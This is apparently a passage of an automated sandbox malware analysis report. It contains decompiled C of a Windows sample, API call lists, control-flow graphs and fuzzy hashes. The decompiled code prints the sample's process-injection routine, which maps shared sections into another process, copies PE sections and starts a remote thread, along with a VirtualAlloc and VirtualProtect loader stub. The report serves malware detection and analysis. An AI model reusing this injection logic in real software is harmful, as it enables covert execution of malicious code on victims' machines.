									_t162 = _t192;
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t193);
									_t229 =  *((intOrPtr*)(_t201 - 0x34));
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_push(_t193);
										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
										__eflags = _t196;
										while(1) {
											__eflags =  *_t196;
											if( *_t196 == 0) {
												break;
											}
											_t176 =  *_t196;
											_t196 = _t196 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t197);
										_t174 = 0;
										__eflags = 0;
										_t108 = _t201 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
									} else {
										L51();
										_pop(_t177);
										_t174 = _t177 - 0x1760;
										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t174, _t229);
			}














































                      0x004014da
                      0x004014cc
                      0x004014d1
                      0x004014d4
                      0x004014de
                      0x004014e3
                      0x004014e6
                      0x004014e8
                      0x004014f1
                      0x004014f3
                      0x004014f3
                      0x004014f6
                      0x004014f6
                      0x004014fb
                      0x00000000
                      0x00000000
                      0x00401829
                      0x00401829
                      0x00401501
                      0x00401504
                      0x00401507
                      0x0040150b
                      0x0040150e
                      0x00401512
                      0x00401518
                      0x0040151b
                      0x0040151d
                      0x00401520
                      0x00401526
                      0x00401529
                      0x00401537
                      0x00401538
                      0x00401539
                      0x0040153b
                      0x00401541
                      0x00401564
                      0x00401567
                      0x0040156a
                      0x0040156d
                      0x00401573
                      0x00401588
                      0x0040158d
                      0x00401590
                      0x00401593
                      0x004015ab
                      0x004015ad
                      0x004015b0
                      0x004015c9
                      0x004015cb
                      0x004015d5
                      0x004015db
                      0x004015e1
                      0x004015e1
                      0x004015c9
                      0x004015ab
                      0x004015e4
                      0x004015f0
                      0x004015f3
                      0x004015f5
                      0x0040160a
                      0x0040161d
                      0x00401620
                      0x00401623
                      0x0040163b
                      0x00401641
                      0x00401644
                      0x0040165b
                      0x0040165d
                      0x00401663
                      0x00401668
                      0x00401668
                      0x00401672
                      0x00401699
                      0x004016a1
                      0x004016c5
                      0x004016c6
                      0x004016c9
                      0x004016e1
                      0x004016f0
                      0x004016f8
                      0x004016fd
                      0x00401706
                      0x0040170f
                      0x0040171b
                      0x0040171d
                      0x00401721
                      0x00401722
                      0x00401728
                      0x00401732
                      0x00401732
                      0x0040172a
                      0x0040172a
                      0x0040172a
                      0x00401738
                      0x00401739
                      0x0040173e
                      0x0040174c
                      0x0040174c
                      0x0040174c
                      0x00401752
                      0x00401754
                      0x00401755
                      0x00401759
                      0x004017c1
                      0x004017c5
                      0x004017d0
                      0x004017d0
                      0x004017d3
                      0x004017d3
                      0x004017d6
                      0x00000000
                      0x00000000
                      0x004017d8
                      0x004017e2
                      0x004017e7
                      0x004017e9
                      0x004017ee
                      0x004017fa
                      0x004017fa
                      0x004017fa
                      0x004017fc
                      0x004017fc
                      0x00401800
                      0x00401807
                      0x00401807
                      0x00401809
                      0x0040180c
                      0x0040181c
                      0x0040175b
                      0x0040175b
                      0x00401760
                      0x00401761
                      0x00401777
                      0x00401786
                      0x00401793
                      0x004017aa
                      0x004017b8
                      0x004017b8
                      0x00401759
                      0x0040165d
                      0x0040163b
                      0x0040160a
                      0x00401541
                      0x0040183d
                      0x0040184b
                      0x00401850
                      0x00401866

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                      • Instruction ID: fcafa90473e3bce6dbc0f334a66e4de9b25c1110b2005182b8d4e3deb893a7aa
                      • Opcode Fuzzy Hash: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                      • Instruction Fuzzy Hash: 515107B1900245BFEB219F91CC48FEFBBB9EF85B10F104129FA11AA2A5D7709945CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004014DD Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 321 4014dd-4014f1 call 40119e 325 4014f3 321->325 326 4014f6-4014fb 321->326 325->326 328 401501-401512 326->328 329 401824-40182c 326->329 332 401822 328->332 333 401518-401541 328->333 329->326 334 401831-401842 329->334 332->334 333->332 343 401547-40155e NtDuplicateObject 333->343 337 401845-401866 call 40119e 334->337 338 401838-40183e 334->338 338->337 343->332 345 401564-401588 NtCreateSection 343->345 347 4015e4-40160a NtCreateSection 345->347 348 40158a-4015ab NtMapViewOfSection 345->348 347->332 351 401610-401614 347->351 348->347 350 4015ad-4015c9 NtMapViewOfSection 348->350 350->347 353 4015cb-4015e1 350->353 351->332 352 40161a-40163b NtMapViewOfSection 351->352 352->332 354 401641-40165d NtMapViewOfSection 352->354 353->347 354->332 355 401663 call 401668 354->355
                      C-Code - Quality: 63%
                      			E004014DD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				void* _t163;
				intOrPtr* _t164;
				void* _t167;
				long _t175;
				intOrPtr _t177;
				void* _t178;
				long* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t193;
				void* _t194;
				intOrPtr* _t197;
				void* _t198;
				void* _t201;
				void* _t202;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				L0040119E(_t84, __ecx, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t202 + 8));
				_t175 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t87;
				_t184 = _t202 - 0x60;
				 *_t184 = _t175;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t184);
				_t90 =  *_t184;
				if(_t90 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t175;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t175, _t175, 2) == 0) {
						 *(_t202 - 8) = _t175;
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t175;
						 *_t98 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t175, _t98, 4, 0x8000000, _t175) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t121 = _t202 - 0x44;
							 *_t121 = _t175;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t121, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
								_t123 = _t202 - 0x3c;
								 *_t123 = _t175;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t123, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t175, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t100 = _t202 - 0x50;
						 *(_t100 + 4) = _t175;
						 *_t100 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						if(NtCreateSection(_t188, 0xe, _t175, _t100, 0x40, 0x8000000, _t175) == 0 &&  *(_t202 - 8) != 0) {
							 *_t46 =  *(_t202 - 0x50);
							_t102 = _t202 - 0x48;
							 *_t102 = _t175;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t102, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
								_t104 = _t202 - 0x40;
								 *_t104 = _t175;
								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t104, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 0x20);
								if(_t224 == 0) {
									L16();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t160 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t161 = _t160;
									asm("loop 0xffffffc2");
									_t162 = _t161 ^ 0xbcc951dd;
									_t204 = _t209 - _t162;
									_t193 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
									_t139 =  *(_t193 + 6) & 0x0000ffff;
									_push(_t193);
									_t163 = _t193;
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_t164 = _t163 + 0xf8;
										__eflags = _t164;
									} else {
										_t164 = _t163 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t164 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t164 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t164 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t194);
									_t229 =  *((intOrPtr*)(_t202 - 0x34));
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_push(_t194);
										_t167 =  *((intOrPtr*)(_t194 + 0x34)) -  *(_t202 - 0x40);
										_t197 =  *((intOrPtr*)(_t194 + 0xa0)) +  *(_t202 - 0x48);
										__eflags = _t197;
										while(1) {
											__eflags =  *_t197;
											if( *_t197 == 0) {
												break;
											}
											_t177 =  *_t197;
											_t197 = _t197 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t167;
												__eflags =  *((intOrPtr*)(0 +  *(_t202 - 0x48) + _t177));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t198);
										_t175 = 0;
										__eflags = 0;
										_t108 = _t202 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t198 + 0x28)) +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t108, 0);
									} else {
										L49();
										_pop(_t178);
										_t175 = _t178 - 0x1760;
										 *((intOrPtr*)(_t175 + 0x1794)) = _t175 + 0x2c17;
										L00401227(_t128, _t175, _t229, _t175 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t175 + 0x17b9)) = _t175 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t175, _t229);
			}












































                      0x004014de
                      0x004014e3
                      0x004014e6
                      0x004014e8
                      0x004014f1
                      0x004014f3
                      0x004014f3
                      0x004014f6
                      0x004014f6
                      0x004014fb
                      0x00000000
                      0x00000000
                      0x00401829
                      0x00401829
                      0x00401501
                      0x00401504
                      0x00401507
                      0x0040150b
                      0x0040150e
                      0x00401512
                      0x00401518
                      0x0040151b
                      0x0040151d
                      0x00401520
                      0x00401526
                      0x00401529
                      0x00401537
                      0x00401538
                      0x00401539
                      0x0040153b
                      0x00401541
                      0x00401564
                      0x00401567
                      0x0040156a
                      0x0040156d
                      0x00401573
                      0x00401588
                      0x0040158d
                      0x00401590
                      0x00401593
                      0x004015ab
                      0x004015ad
                      0x004015b0
                      0x004015c9
                      0x004015cb
                      0x004015d5
                      0x004015db
                      0x004015e1
                      0x004015e1
                      0x004015c9
                      0x004015ab
                      0x004015e4
                      0x004015f0
                      0x004015f3
                      0x004015f5
                      0x0040160a
                      0x0040161d
                      0x00401620
                      0x00401623
                      0x0040163b
                      0x00401641
                      0x00401644
                      0x0040165b
                      0x0040165d
                      0x00401663
                      0x00401668
                      0x00401668
                      0x00401672
                      0x00401699
                      0x004016a1
                      0x004016c5
                      0x004016c6
                      0x004016c9
                      0x004016e1
                      0x004016f0
                      0x004016f8
                      0x004016fd
                      0x00401706
                      0x0040170f
                      0x0040171b
                      0x0040171d
                      0x00401721
                      0x00401722
                      0x00401728
                      0x00401732
                      0x00401732
                      0x0040172a
                      0x0040172a
                      0x0040172a
                      0x00401738
                      0x00401739
                      0x0040173e
                      0x0040174c
                      0x0040174c
                      0x0040174c
                      0x00401752
                      0x00401754
                      0x00401755
                      0x00401759
                      0x004017c1
                      0x004017c5
                      0x004017d0
                      0x004017d0
                      0x004017d3
                      0x004017d3
                      0x004017d6
                      0x00000000
                      0x00000000
                      0x004017d8
                      0x004017e2
                      0x004017e7
                      0x004017e9
                      0x004017ee
                      0x004017fa
                      0x004017fa
                      0x004017fa
                      0x004017fc
                      0x004017fc
                      0x00401800
                      0x00401807
                      0x00401807
                      0x00401809
                      0x0040180c
                      0x0040181c
                      0x0040175b
                      0x0040175b
                      0x00401760
                      0x00401761
                      0x00401777
                      0x00401786
                      0x00401793
                      0x004017aa
                      0x004017b8
                      0x004017b8
                      0x00401759
                      0x0040165d
                      0x0040163b
                      0x0040160a
                      0x00401541
                      0x0040183d
                      0x0040184b
                      0x00401850
                      0x00401866

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                      • Instruction ID: c414ae2dcce1999d5ff69eab83f34e0e1241aa209a2fbae03b06ced14e898130
                      • Opcode Fuzzy Hash: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                      • Instruction Fuzzy Hash: 085106B1900249BFEF219F91CC48FEFBBB9EF85B10F104119FA11AA2A5D7709940CB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0226003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 226003c-2260047 1 226004c-2260263 call 2260a3f call 2260e0f call 2260d90 VirtualAlloc 0->1 2 2260049 0->2 17 2260265-2260289 call 2260a69 1->17 18 226028b-2260292 1->18 2->1 23 22602ce-22603c2 VirtualProtect call 2260cce call 2260ce7 17->23 20 22602a1-22602b0 18->20 22 22602b2-22602cc 20->22 20->23 22->20 29 22603d1-22603e0 23->29 30 22603e2-2260437 call 2260ce7 29->30 31 2260439-22604b8 VirtualFree 29->31 30->29 32 22605f4-22605fe 31->32 33 22604be-22604cd 31->33 37 2260604-226060d 32->37 38 226077f-2260789 32->38 36 22604d3-22604dd 33->36 36->32 40 22604e3-2260505 36->40 37->38 43 2260613-2260637 37->43 41 22607a6-22607b0 38->41 42 226078b-22607a3 38->42 51 2260517-2260520 40->51 52 2260507-2260515 40->52 44 22607b6-22607cb 41->44 45 226086e-22608be LoadLibraryA 41->45 42->41 46 226063e-2260648 43->46 48 22607d2-22607d5 44->48 50 22608c7-22608f9 45->50 46->38 49 226064e-226065a 46->49 53 22607d7-22607e0 48->53 54 2260824-2260833 48->54 49->38 55 2260660-226066a 49->55 56 2260902-226091d 50->56 57 22608fb-2260901 50->57 58 2260526-2260547 51->58 52->58 59 22607e4-2260822 53->59 60 22607e2 53->60 62 2260839-226083c 54->62 61 226067a-2260689 55->61 57->56 63 226054d-2260550 58->63 59->48 60->54 64 2260750-226077a 61->64 65 226068f-22606b2 61->65 62->45 66 226083e-2260847 62->66 68 2260556-226056b 63->68 69 22605e0-22605ef 63->69 64->46 70 22606b4-22606ed 65->70 71 22606ef-22606fc 65->71 72 226084b-226086c 66->72 73 2260849 66->73 76 226056f-226057a 68->76 77 226056d 68->77 69->36 70->71 74 22606fe-2260748 71->74 75 226074b 71->75 72->62 73->45 74->75 75->61 80 226057c-2260599 76->80 81 226059b-22605bb 76->81 77->69 84 22605bd-22605db 80->84 81->84 84->63
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0226024D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2260000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: cess$kernel32.dll
                      • API String ID: 4275171209-1230238691
                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction ID: f0866a4a534265b635c4f48f5103a6679655d60997b2cb50cb092b7cbc6e10b9
                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction Fuzzy Hash: 60527975A11229DFDB64CF98C984BACBBB1BF09304F1480D9E90DAB355DB30AA85DF14
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02260E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 358 2260e0f-2260e24 SetErrorMode * 2 359 2260e26 358->359 360 2260e2b-2260e2c 358->360 359->360
                      APIs
                      • SetErrorMode.KERNELBASE(00000400,?,?,02260223,?,?), ref: 02260E19
                      • SetErrorMode.KERNELBASE(00000000,?,?,02260223,?,?), ref: 02260E1E
                      Memory Dump Source
                      • Source File: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2260000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction ID: 01df04ff48ef7195399de051aa7a3bf3c448f718d79b6c25c3f555e1db7778fa
                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction Fuzzy Hash: F4D0123255512877D7002AD4DC0DBDD7B1CDF09B66F008011FB0DD9080C770964046E5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040E703 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 361 40e703-40e712 363 40e714-40e717 361->363 364 40e718-40e71b 361->364 365 40e72b-40e734 call 4111b8 364->365 366 40e71d-40e722 364->366 369 40e739-40e73e 365->369 366->366 367 40e724-40e729 366->367 367->365 367->366 370 40e740-40e74c 369->370 371 40e74d-40e758 369->371 371->370
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: __malloc_crt
                      • String ID:
                      • API String ID: 3464615804-0
                      • Opcode ID: 501dda1f62610471c31aec79cd889d8af2f544a4fc306c4e666a9dbeabe91d77
                      • Instruction ID: fc55ce3b648994ae0669cb83a6c03f413a82d86dd79d98679187b4526597e74b
                      • Opcode Fuzzy Hash: 501dda1f62610471c31aec79cd889d8af2f544a4fc306c4e666a9dbeabe91d77
                      • Instruction Fuzzy Hash: 92F09E339001205DD720773A3C048770629DAC63693150C3BF692E3281F6380C8342E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040E7AC Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 374 40e7ac-40e7ce HeapCreate 375 40e7d0-40e7d1 374->375 376 40e7d2-40e7db 374->376
                      APIs
                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040E7C1
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: CreateHeap
                      • String ID:
                      • API String ID: 10892065-0
                      • Opcode ID: b393221473d5128b1f0148c2de5562a25426e395ddf46944ff430698e6d466b0
                      • Instruction ID: cc9ea7525e2f4401f88430c5405be3d1bc70efe095c2ac504a773410bf562ff0
                      • Opcode Fuzzy Hash: b393221473d5128b1f0148c2de5562a25426e395ddf46944ff430698e6d466b0
                      • Instruction Fuzzy Hash: 96D05E369583445EEB105FB56D087623BDCD784795F049436B90CDA6A0E674C650DA44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040A0CD Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 377 40a0cd-40a0cf call 40a05b 379 40a0d4-40a0d5 377->379
                      APIs
                      • __encode_pointer.LIBCMT ref: 0040A0CF
                        • Part of subcall function 0040A05B: RtlEncodePointer.NTDLL(?), ref: 0040A0C2
                      Memory Dump Source
                      • Source File: 00000000.00000002.388729323.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_409000_file.jbxd
                      Similarity
                      • API ID: EncodePointer__encode_pointer
                      • String ID:
                      • API String ID: 4150071819-0
                      • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                      • Instruction ID: 50ed121f21e01714d4d4106e0456cc313bcbcd0e045e12985174d0a2d6778b00
                      • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 380 401869-4018bd call 40119e Sleep call 4013d8 391 4018cc-401907 call 40119e 380->391 392 4018bf-4018c7 call 4014a8 380->392 392->391
                      C-Code - Quality: 62%
                      			E00401869(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __edi;
				void* __ebp;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				signed char _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;

				_t24 = __eflags;
				_push(0x18a0);
				_t8 =  *_t21;
				_t22 = _t21 + 4;
				L0040119E(_t8, 0x63, _t20, __eflags);
				_t16 = _a4;
				Sleep(0x1388);
				_t11 = E004013D8(_t19, _t24, _t16, _a8, _a12,  &_v8); // executed
				_t25 = _t11;
				if(_t11 != 0) {
					E004014A8(_t25, _t16, _t11, _v8, _a16); // executed
				}
				 *_t16(0xffffffff, 0);
				_push(0x18a0);
				_t13 =  *_t22;
				return L0040119E(_t13, 0x63, _t20, _t25);
			}














                      0x00401869
                      0x00401877
                      0x0040187c
                      0x0040187f
                      0x0040189b
                      0x004018a0
                      0x004018a8
                      0x004018b6
                      0x004018bb
                      0x004018bd
                      0x004018c7
                      0x004018c7
                      0x004018d0
                      0x004018d9
                      0x004018de
                      0x00401907

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000000.00000002.388698365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 6296850e33a145ab6595ce586122c29eccd5567035ad5b983bd76f19fb0b0644
                      • Instruction ID: 60862f2667b59bfd2b53fd736c2ec37b6a52218a42a16e6e58fdf04961db7cc8
                      • Opcode Fuzzy Hash: 6296850e33a145ab6595ce586122c29eccd5567035ad5b983bd76f19fb0b0644
                      • Instruction Fuzzy Hash: 79015E37608204E7E7007A95DC8197A37699B45354F208137BA13791E1D63D9B12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040188B Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 403 40188b-4018bd call 40119e Sleep call 4013d8 410 4018cc-401907 call 40119e 403->410 411 4018bf-4018c7 call 4014a8 403->411 411->410
                      C-Code - Quality: 62%
                      			E0040188B(signed char __eax, void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t13;
				intOrPtr _t15;
				intOrPtr* _t19;
				signed char _t24;
